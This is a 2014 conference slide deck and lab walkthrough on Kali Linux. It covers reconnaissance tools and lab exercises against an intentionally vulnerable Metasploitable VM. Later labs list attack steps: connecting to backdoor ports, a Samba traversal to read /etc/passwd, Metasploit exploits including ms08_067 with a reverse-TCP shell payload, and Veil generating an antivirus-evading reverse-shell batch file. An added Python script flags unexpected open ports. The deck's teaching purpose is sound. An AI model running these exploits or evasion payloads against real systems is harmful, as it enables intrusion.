What is Kali Linux? 
Information Security Summit 2014 
Westlake, Ohio
Kali Linux - Falconer - ISS 2014
This is a presentation and how-to I gave at the Information Security Summit 2014.

Slide 1: What is Kali Linux?
Information Security Summit 2014, Westlake, Ohio

Slide 2: Welcome to ISS 2014

Slide 3: Welcome
Tony Godfrey is the CEO / Linux Consultant of Falconer Technologies (est. 2003), specializing in Linux. He has written several articles on the body of knowledge of security administration, is a regular contributor to a variety of Linux publications, and has written technical content for Linux education nationwide at the college level. He also teaches topics covering Linux, Network Security, Cisco routers, Cybercrime and System Forensics.

Slide 4: Welcome
Side Note: I put a lot of extra materials, websites, & definitions in the 'Notes' section of this PPT.

Slide 5: Overview of Presentation
- Intro, Description, How used, Background
- Extra Info, Kali in a Box, Raspberry PI
- Tools, Overview, & Conclusion
- Setting up the Environments
- CLI 101 / Tools 101
- Kali 101, 201, & 301

Slide 6: Presentation on Kali Linux - Intro

Slide 7: Who or What is 'Kali'?

Slide 8: Who is Kali?
Kali, the mother goddess, despite her fearful appearance, protects the good against the evil. Unlike the other Hindu deities her form is pretty scary and formidable, intended to scare away the demons both literally and figuratively! (Anu Yadavalli)

Slide 9: Hindu Kali

Slide 10: What is Kali Linux?
Kali Linux is a Debian-derived Linux distribution designed for digital forensics and penetration testing. It is maintained and funded by Offensive Security Ltd. It was developed by Mati Aharoni and Devon Kearns of Offensive Security through the rewrite of BackTrack, their previous forensics Linux distribution.

Slide 11: BackTrack?
Kali Linux is the 'rebirth' of BackTrack Linux. This is a custom distribution designed for security testing for all skill levels from novice to expert. It is the largest collection of wireless hacking, server exploiting, web application assessing, and social-engineering tools available in a single Linux distribution.

Slide 12: Developers - March 12, 2013
"Seven years of developing BackTrack Linux has taught us a significant amount about what we, and the security community, think a penetration testing distribution should look like. We've taken all of this knowledge and experience and implemented it in our "next generation" penetration testing distribution."

Slide 13: Developers - March 12, 2013
"After a year of silent development, we are incredibly proud to announce the release and public availability of "Kali Linux", the most advanced, robust, and stable penetration testing distribution to date. Kali is a more mature, secure, and enterprise-ready version of BackTrack Linux."

Slide 14: Warning!
Kali Linux's developers would like everyone to use Kali Linux. But Kali is a Linux distribution specifically geared towards professional penetration testing and security auditing, and as such it is NOT a recommended distribution for those unfamiliar with Linux.

Slide 15: Hardware / Software
Kali likes its own dedicated hardware. If you are learning about Kali and penetration testing (Metasploitable), then a virtualized environment may be a consideration. VMware Player 5 works well; set the RAM to 1 GB.

Slide 16: Hardware / Software
Kali recommends 10 GB for the initial install, 512 MB RAM minimum, i386/AMD64, CD/DVD / USB support. Now... if 'Veil' is installed (+10 GB) and you are doing the updates/upgrades (+5 GB), and don't forget the Alfa antenna.

Slide 17: http://www.kali.org/

Slide 18: Other guys?

Slide 19: Other guys? BackBox
BackBox is an Ubuntu-based distribution developed to perform penetration tests and security assessments. It provides a minimal yet complete desktop environment, thanks to its own software repositories, which are always updated to the latest stable versions of the most often used and best-known ethical hacking tools.

Slide 20: Other guys? Pentoo
Pentoo is a Live CD/USB designed for penetration testing and security assessment. Based on Gentoo, it is provided as a 32/64-bit installable live CD. It features packet-injection-patched wifi drivers, GPGPU cracking software, and lots of tools for penetration testing and security assessment.

Slide 21: Other guys? BlackBuntu
BlackBuntu is a distribution for penetration testing which was specially designed for security training students and practitioners of information security. Blackbuntu is a penetration testing distribution with the GNOME Desktop Environment. It is currently being built using Ubuntu 10.10.

Slide 22: Other guys? EnGarde
EnGarde Secure Linux was designed to support features suitable for individuals, students, security enthusiasts, and those wishing to evaluate the level of security and ease of management available in Guardian Digital enterprise products.

Slide 23: Other guys? A few more...
Slide 24: Presentation on Kali Linux - Categories & Websites

Slide 25: What's in the box, Pandora?

Slide 26: There are several categories
- Top 10 Security Tools
- Information Gathering
- Vulnerability Analysis
- Web Applications / Password Attacks
- Wireless Attacks / Exploitation Tools
- Sniffing/Spoofing / Maintaining Access
- Reverse Engineering
- Stress Testing / Hardware Hacking
- Forensics / Reporting Tools
- System Services

Slide 27: Metapackages also exist

Slide 28: Kali Information
See 'Notes' section in this slide

Slide 29: Kali Information
- Getting your pentesting lab ready
- Hacking tutorial
- 20 things to do after installing Kali
- Cracking WEP
- 6 Resources & Tutorials on Kali

Slide 30: Kali & More PenTesting
See 'Notes' section in this slide

Slide 31: Kali & More PenTesting
- PenTest Tools
- Penetration Testing Tools
- PenTestMag
- Chrome as a PenTest Tool
- Firefox as a PenTest Tool

Slide 32: Kali-specific Websites
See 'Notes' section in this slide

Slide 33: Kali-specific Websites
- Kali4Hackers
- Hacking with Kali Linux
- YouTube
- Kali Linux
- Hack with Kali Linux

Slide 34: Kali Publications
See 'Notes' section in this slide

Slide 35: Kali Publications
- Kali Book
- BackTrack to Kali
- Basic Security Testing with Kali
- Kali Linux Assuring Security

Slide 36: Kali in a box?
Do you want to run Kali on a tablet or phone? http://www.kali.org/how-to/kali-linux-android-linux-deploy/

Slide 37: Kali in a box?
Basically...
1. Get a tablet
2. Install 'Linux Deploy'
3. Install Samsung Kies on PC
4. Tablet - USB Debugging ON
5. Install SuperOneClick on PC
6. Wait 5 minutes...
7. Done

Slide 38: Kali + Nexus = NetHunter
Do you want to run Kali on a Nexus? http://www.kali.org/kali-linux-nethunter/

Slide 39: Kali on a Nexus?

Slide 40: Kali & Lifehacker
How to hack your own network and beef up its security with Kali Linux: http://lifehacker.com/how-to-hack-your-own-network-and-beef-up-its-security-w-1649785071

Slide 41: Kali & Raspberry PI
See 'Notes' section in this slide

Slide 42: What is Metasploitable?
See 'Notes' section in this slide

Slide 43: Metasploitable?
Metasploitable is an intentionally vulnerable Linux virtual machine. This VM can be used to conduct security training, test security tools, and practice common penetration testing techniques. The default login and password is msfadmin:msfadmin.

Slide 44: Presentation on Kali Linux - DVD, Tools, Demo

Slide 45: What's on the DVD?
/books
  - Official Kali Guide
  - eForensics
  - Other published materials
/media
  - 7-Zip, kali_iso, metasploitable doc, SD_formatter, Unetbootin, USB_installer, VMware, Win32_DiskImager
/PPT
Slide 46: Legend
- We're going to type something
- We're going to make a note
- Might be a question?
- We're going to click on something
- Recon
- Attack

Slide 47: traceroute
- traceroute
Essentially, 'tracert' in Windows.
- traceroute -i eth0 <Target IP>
It displays the route (path) and measures transit delays of packets across an Internet Protocol (IP) network.

Slide 48: nmap
- nmap -p0-65535 <Target IP> | less
A security scanner used to discover hosts and services on a computer network, thus creating a "map" of the network.

Slide 49: nmap
- nmap -sS -Pn -A <Target IP>
A security scanner used to discover hosts and services on a computer network. -sS is a SYN ("stealth") scan, -Pn skips host discovery (no ping), and -A enables OS detection, service/version detection, default scripts and traceroute.

Slide 50: rpcinfo
- rpcinfo -p <Target IP>
A utility that makes a Remote Procedure Call (RPC) to an RPC server and reports what it finds. It lists all programs registered with the port mapper on the specified host.

Slide 51: tcpdump
On Kali...
- tcpdump -i eth0 src <Target IP>
On Metasploitable...
- ping www.yahoo.com
- open a browser & go to CNN.com

Slide 52: nikto
On Kali
- nikto -h <Target IP>
It's an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6700 potentially dangerous files/CGIs, checks for outdated versions of over 1250 servers, and version-specific problems on over 270 servers.

Slide 53: whatweb
From Kali
- whatweb <Target IP>
- whatweb -v <Target IP>
- whatweb -a 4 <Target IP>
WhatWeb recognizes web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices.

Slide 54: Zenmap
Let's run Zenmap
- Applications → Kali Linux → Information Gathering → DNS Analysis → Zenmap

Slide 55: SHODAN
Let's run SHODAN
- Open a browser
- www.shodanhq.com
- type in 'almost anything'
- ...Be very nervous...

Slide 56: dmitry
If you want something more basic... dmitry
- dmitry -s <domain.com>
- It gives you site names & IPs

Slide 57: Presentation on Kali Linux - Final Thoughts

Slide 58: Thank you
Thank you for your time.
Falconer Technologies
TonyGodfrey@FalconerTechnologies.com
877 / TUX RULZ or 877 / 889-7859

Slide 59: Use your powers for good

Slide 60: Thank You

Slide 61: The second part of this slide deck covers more tools and hands-on.
Slide 62: Presentation on Kali Linux - Lab #1 & Prep

Slide 63: Getting Ready...
- Let's make a folder called kali_2014
- Copy the DVD contents into that folder
- Install 7-Zip
- Install VMware Player
Let's make sure the virtual environments are working and can 'ping' each other.

Slide 64: VMware Player
Press <CTRL><Alt> at the same time to be released from the current virtual environment. You can then do a normal <Alt><Tab> to toggle between different applications.

Slide 65: Logins / Passwords
- Kali Login → root
- Kali Password → password
- Metasploitable Login → msfadmin
- Metasploitable Password → msfadmin
Download Metasploitable from: http://sourceforge.net/projects/metasploitable/

Slide 66: Metasploitable V/E
- Login → msfadmin
- Password → msfadmin
- ifconfig
- Jot down the IP & Netmask
- route
- Jot down the Gateway

Slide 67: Metasploitable V/E
Virtual Environment #1: Metasploitable
- Go to TERMINAL
- rlogin -l root <IP Address>
- cd /tmp
- ls -l ...vs... ls -la
- rm .X0-lock
- startx

Slide 68: Kali V/E
- Login → root
- Password → password
- ifconfig
- Jot down the IP & Netmask
- route
- Jot down the Gateway

Slide 69: Kali V/E
Go to: Applications → System Tools → Preferences → System Settings → Display → Resolution: ____
Then... [Apply]

Slide 70: Kali Updating
From the command line, type:
- apt-get update && apt-get upgrade
Note: This has already been done to save time, but should be done after a new installation.
Slide 71: Presentation on Kali Linux - Lab #2 - Command Line Tools

Slide 72: Command Line Tools (Presentation on Kali Linux)

Slide 73: Legend
- We're going to type something
- We're going to make a note
- Might be a question?
- We're going to click on something
- Recon
- Attack

Slide 74: ping
- ping
Packet InterNet Groper. ICMP type 8 (echo request). Checks network reachability between two hosts.
- (from Kali) ping <Target IP>
Did it echo back?

Slide 75: top
- top
Tells us what services are running, processes, memory allocation. Basically, a live system monitor.

Slide 76: df
- df
Tells us how much space is available, or 'disk free'.

Slide 77: du
- du
Tells us how much space is taken, or 'disk used'. You can get a shorter report with 'du -s' (disk used, summary).

Slide 78: free
- free
How much 'free' memory is available.

Slide 79: ls
- ls
This is for 'list'.
- ls -l (list, long format)
- ls -la (list, long format, all entries including hidden dotfiles)

Slide 80: pwd
- pwd
Directory structure. Means 'path to working directory' or 'print working directory'.

Slide 81: ps / ps aux / pstree
- ps
Means 'Process Status'.
- aux: all users (a), user-oriented format (u), including processes without a controlling terminal (x)
- pstree: shows parent/child relationships
- Windows: tasklist / taskkill
kill - stops a process (ex: kill PID)
Slide 82: Presentation on Kali Linux - Lab #3 - CLI & Services

Slide 83: CLI & Services (Presentation on Kali Linux)

Slide 84: traceroute
- traceroute
Essentially, 'tracert' in Windows.
- traceroute -i eth0 <Target IP>
It displays the route (path) and measures transit delays of packets across an Internet Protocol (IP) network.

Slide 85: nmap
- nmap -p0-65535 <Target IP> | less
A security scanner used to discover hosts and services on a computer network, thus creating a "map" of the network.

Slide 86: nmap
- nmap -sS -Pn -A <Target IP>
A security scanner used to discover hosts and services on a computer network. -sS is a SYN ("stealth") scan, -Pn skips host discovery (no ping), and -A enables OS detection, service/version detection, default scripts and traceroute.

Slide 87: rlogin (from Metasploitable)
- rlogin -l root <Target IP>
- whoami
- tcpdump -i eth0 host <Target IP>
A packet analyzer that runs under the command line. It allows the user to intercept and display TCP/IP and other packets being transmitted or received over a network to which the computer is attached.
Slide 88: rpcinfo
- rpcinfo -p <Target IP>
A utility that makes a Remote Procedure Call (RPC) to an RPC server and reports what it finds. It lists all programs registered with the port mapper on the specified host.

Slide 89: showmount
- showmount -e <Target IP>
- showmount -a <Target IP>
It displays a list of all clients that have remotely mounted a file system from the specified machine (the Host parameter). This information is maintained by the [mountd] daemon on that host.

Slide 90: telnet
- telnet <Target IP> 21
After '220...'
- user backdoored:)
- <CTRL><]>
- quit
Port 20/21 is FTP.

Slide 91: telnet
- telnet <Target IP> 6200
After 'Escape character...',
- id;
- <CTRL><]>
- quit
Port 6200 - Oracle Notification Service remote port, Oracle Application Server.

Slide 92: telnet
- telnet <Target IP> 6667
IRC (Internet Relay Chat). Many trojans/backdoors also use this port: Dark Connection Inside, Dark FTP, Host Control, NetBus worm, ScheduleAgent, SubSeven, Trinity, WinSatan, Vampire, Moses, Maniacrootkit, kaitex, EGO.

Slide 93: telnet
- telnet <Target IP> 1524
After 'root@meta....',
- id
Many attack scripts install a backdoor shell at this port (especially those against Sun systems via holes in sendmail and RPC services like statd, ttdbserver, and cmsd). Connections to port 600/pcserver also have this problem. Note: ingreslock, Trinoo; talks UDP/TCP.
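Added example, not part of the original deck: the telnet slides above step through listeners (6200, 6667, 1524) that no production host should expose, and the defensive counterpart is to diff a scan against a documented baseline of what each host is supposed to serve. The script parses nmap's grepable (-oG) output format; the scan text is constructed to resemble `nmap -sS -Pn -oG -` output for a lab host and the baseline is an assumed allowlist, both made up for this illustration.

```python
"""Flag open TCP ports that are not in a per-host baseline.

Added example (not from the original slide deck). SAMPLE_SCAN is a
constructed nmap grepable (-oG) report for one lab host; BASELINE is an
assumed inventory of the ports that host is documented to expose.
"""
import re

SAMPLE_SCAN = """\
# Nmap 6.47 scan initiated as: nmap -sS -Pn -oG - 10.0.2.4
Host: 10.0.2.4 ()\tStatus: Up
Host: 10.0.2.4 ()\tPorts: 21/open/tcp//ftp///, 22/open/tcp//ssh///, 80/open/tcp//http///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///, 1524/open/tcp//ingreslock///, 6200/open/tcp//lm-x///, 6667/open/tcp//irc///\tIgnored State: closed (992)
# Nmap done -- 1 IP address (1 host up) scanned
"""

# Assumed baseline: TCP ports each host is documented to expose.
BASELINE = {
    "10.0.2.4": {21, 22, 80, 139, 445},
}

# One -oG port entry is port/state/protocol/owner/service/rpcinfo/version/.
# The owner field is assumed empty, which is how nmap prints it by default.
PORT_RE = re.compile(
    r"(?P<port>\d+)/(?P<state>\w+)/(?P<proto>\w+)//(?P<service>[^/,]*)/"
)


def parse_grepable(text):
    """Return {host: [(port, proto, service), ...]} for open ports only."""
    found = {}
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        host = line.split()[1]
        # Fields in -oG output are tab separated; keep only the Ports field.
        ports_field = line.split("Ports:", 1)[1].split("\t", 1)[0]
        for m in PORT_RE.finditer(ports_field):
            if m.group("state") == "open":
                found.setdefault(host, []).append(
                    (int(m.group("port")), m.group("proto"), m.group("service"))
                )
    return found


def unexpected_listeners(scan_text, baseline):
    """Return {host: [(port, service), ...]} for open TCP ports that are not
    in the host's baseline. A scanned host with no baseline entry at all is
    treated as having an empty allowlist, so every open port is reported."""
    report = {}
    for host, entries in parse_grepable(scan_text).items():
        allowed = baseline.get(host, set())
        extra = [
            (port, service)
            for port, proto, service in entries
            if proto == "tcp" and port not in allowed
        ]
        if extra:
            report[host] = sorted(extra)
    return report


if __name__ == "__main__":
    for host, extras in unexpected_listeners(SAMPLE_SCAN, BASELINE).items():
        for port, service in extras:
            print(f"{host}: unexpected listener {port}/tcp ({service})")
```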
Slide 94: Presentation on Kali Linux - Lab #4 - Working w/Metasploitable

Slide 95: smbclient
- smbclient -L //<Target IP>
- msfconsole
...wait, wait, wait..., then
- use auxiliary/admin/smb/samba_symlink_traversal
- set RHOST <Target IP>
- set SMBSHARE tmp

Slide 96: smbclient
- exploit
...Connecting to the server.....
...<yadda, yadda, yadda>...
...Auxiliary module....
At the prompt, type: exit

Slide 97: smbclient
- smbclient //<Target IP>/tmp
Do you get the 'smb: >' prompt?
- cd rootfs
- cd etc
- more passwd
Do you get a list of all user accounts?

Slide 98: tcpdump
On Kali...
- tcpdump -i eth0 src <Target IP>
On Metasploitable...
- ping www.yahoo.com
- open a browser & go to CNN.com

Slide 99: netdiscover
On Kali
- netdiscover -i eth0 -r <Target IP>/24
Netdiscover is an active/passive address reconnaissance tool, mainly developed for wireless networks without a DHCP server, when you are wardriving. It can also be used on hub/switched networks.

Slide 100: nikto
On Kali
- nikto -h <Target IP>
It's an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6700 potentially dangerous files/CGIs, checks for outdated versions of over 1250 servers, and version-specific problems on over 270 servers.

Slide 101: sqlmap
On Kali
- sqlmap -u http://<Target IP> --dbs
It is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers.

Slide 102: Wasp Services
From Kali - open IceWeasel
- http://<Target IP>/
Research: Mutillidae <p. 8>
The Mutillidae are a family of more than 3,000 species of wasps (despite the name) whose wingless females resemble large, hairy ants. Their common name 'velvet ant' refers to their dense pile of hair which most often is bright scarlet or orange, but may also be black, white, silver, or gold.

Slide 103: Web Services
From Kali - open IceWeasel
- http://<Target IP>/
Research: Mutillidae <p. 8>
Mutillidae is a free, open source web application provided to allow security enthusiasts to pen-test and hack a web application.

Slide 104: whatweb
From Kali
- whatweb <Target IP>
- whatweb -v <Target IP>
- whatweb -a 4 <Target IP>
WhatWeb recognizes web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices.
Slide 105: Presentation on Kali Linux - Lab #5 - msfconsole

Slide 106: From Kali - msfconsole (Presentation on Kali Linux)

Slide 107: msfconsole
From Kali
- service postgresql start
- service metasploit start
- msfconsole
Let's fire up the database (PostgreSQL), start Metasploit, then start msfconsole. We will then take a look at the built-in exploit tools.

Slide 108: msfconsole
From the [msf>] console
- help search
- show exploits
- search dns
'help search' shows all of the options, 'show exploits' shows all the built-in exploits in msfconsole, and 'search dns' will look for any DNS exploits.

Slide 109: msfconsole
From the [msf>] console
- search Microsoft
- search diablo
- search irc
- search http
Let's try a few more to see what they do....

Slide 110: msfconsole
From the [msf>] console, search for 'unreal'
- info <exploit>
- use <exploit>
- show options
- LHOST, RHOST, LPORT, RPORT

Slide 111: msfconsole
From the [msf>] console (ex: unreal)
- set RHOST <IP Address>
- show options
- exploit

Slide 112: msfconsole
From the [msf>] console, search for 'twiki'
- info <exploit>
- use <exploit>
- show options
- LHOST, RHOST, LPORT, RPORT

Slide 113: msfconsole
From the [msf>] console (ex: 'twiki')
- set RHOST <IP Address>
- show options
- exploit

Slide 114: msfconsole
From the [msf>] console (target: Win XP)
- use exploit/windows/smb/ms08_067_netapi
- show options
- show targets
- set target 2

Slide 115: msfconsole
From the [msf>] console (target: Win XP)
- show options
- show advanced
- show targets
- show payloads

Slide 116: msfconsole
From the [msf>] console (target: Win XP)
- set payload windows/shell_reverse_tcp
- show options
- set LHOST <Kali IP Address>
- set RHOST <Target IP Address>

Slide 117: msfconsole
From the [msf>] console (target: Win XP)
- show options
- exploit
- Any errors?
Slide 118: Presentation on Kali Linux - Lab #6 - more GUI

Slide 119: From Kali - more GUI (Presentation on Kali Linux)

Slide 120: Zenmap
Let's run Zenmap
- Applications → Kali Linux → Information Gathering → DNS Analysis → Zenmap

Slide 121: SHODAN
Let's run SHODAN
- Open a browser
- www.shodanhq.com
- type in 'almost anything'
- ...Be very nervous...

Slide 122: FERN
Let's run FERN
- Kali Linux → Wireless Attacks → Wireless Tools → fern-wifi-cracker

Slide 123: recon-ng
Kali has many built-in tools, but you can always install more (it is Debian-based). You may wish to add more, such as recon-ng: automated info gathering and network reconnaissance.

Slide 124: recon-ng
Let's run recon-ng...
- cd /opt/recon-ng
- /usr/bin/python recon-ng
- show modules
- recon/hosts/gather/http/web/google_site

Slide 125: recon-ng
Let's run recon-ng...
- set DOMAIN <domain.com>
- run (...let this run awhile...)
- back (...previous level...)
- show modules

Slide 126: recon-ng
Let's run recon-ng...
- use reporting/csv
- run
- Will add your new information to /usr/share/recon-ng/workspaces/default

Slide 127: dmitry
If you want something more basic... dmitry
- dmitry -s <domain.com>
- It gives you site names & IPs

Slide 128: veil
Kali has many built-in tools, but you can always install even more (it is Debian-based). You may wish to add more, such as veil.
veil: remote shell payload generator that can bypass many anti-virus programs.

Slide 129: veil
Let's run veil
- veil-evasion
- list (available payloads list)
- use 13 (powershell/VirtualAlloc)
- generate

Slide 130: veil
Let's run veil
- 1 (msfvenom)
- [ENTER] (accept default)
- Value for LHOST (the Kali IP the reverse shell connects back to)
- Value for LPORT (ex: 4000)

Slide 131: veil
Let's run veil
- Output name ("Squatch")
- It will store this new batch file in the /usr/share/veil/output/source folder. When the file is run from the target machine, it will attempt to open a reverse shell session with Kali.
Slide 132: Presentation on Kali Linux - Final Thoughts

Slide 133: Thank you
Thank you for your time.
Falconer Technologies
TonyGodfrey@FalconerTechnologies.com
877 / TUX RULZ or 877 / 889-7859

Slide 134: Use your powers for good

Slide 135: Thank You